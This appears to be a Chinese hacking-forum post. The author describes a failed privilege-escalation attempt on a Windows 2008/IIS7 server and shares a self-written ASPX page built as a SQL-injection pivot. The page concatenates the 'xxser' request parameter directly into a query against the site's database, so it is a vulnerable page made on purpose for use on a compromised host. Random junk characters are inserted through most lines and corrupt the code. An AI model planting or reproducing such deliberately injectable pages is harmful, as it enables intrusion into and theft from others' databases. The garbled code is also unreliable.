昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。! X& f; f% Y6 @1 |0 @5 F2 k
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。( B( A6 r8 J7 y. K5 q) Z
代码量不多,自己写个拉倒了。烦死了。
9 N3 ^+ \! d: x8 _$ M8 @- ?% T8 n- ]! E
! U. W) x j/ y4 `
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">- H1 y; W; |$ G: N3 G3 N! ~
<html xmlns="http://www.w3.org/1999/xhtml">" {/ A0 B7 l, E8 y
<head runat="server">4 M0 B; ^* n* b# B6 P+ D1 h
<title>暗影aspx构造注射专用页面</title>. o" a- _9 Z% S4 m
</head>2 i. V: s+ |4 U3 o0 |
<body># n9 e; l* F$ }; {
<form id="form1" runat="server">
1 i& Y# s3 w2 a <div>3 a3 P' W9 k' a% A7 i5 Y5 {
<script language="c#" runat="server">
" k" l ]2 Y6 x( i7 R
2 `8 A3 T0 Q( [8 [9 J void page_init(object sender, EventArgs e)1 M/ ]( [ V* t
{4 m2 M$ y9 E# V) B
$ q! t1 F$ g5 Y; f- b* |; F
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();/ G! _5 u; v5 z+ t% d8 @
8 l: }! y& d- n* p# ]0 q' E8 j8 r
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();. t9 ^( n7 R. v) W* I4 ]9 X
conn.Open();
- H5 Y5 e4 J: H 9 o$ ~1 ]; D% M# y8 g0 ]
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=13 j9 r# _+ v& @: V6 j; |
# b9 P1 r: {6 ~( \. l
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
; s3 s5 M2 h7 b2 z int x = command.ExecuteNonQuery();
( W @! @: C. A) F0 }. a Response.Write(i+"\n");& R3 ~ S, [7 P2 v- }
Response.Write(x);
5 d- C* q2 t) w; [0 V4 C conn.Close();# ]2 }4 l8 k4 \8 o* }, h
}6 F y' w9 H3 f9 i2 C+ X/ [
0 A( z" U) r" X% f4 I! z </script>$ H: ` c; U8 I2 }. ?
</div>" G9 N+ Z; c4 z, e8 B
</form>, C1 u2 C: g! m0 k
</body>
; C# K% @0 e" e' }6 X! @0 c</html>
# X4 V1 c* e& h9 e( }+ x |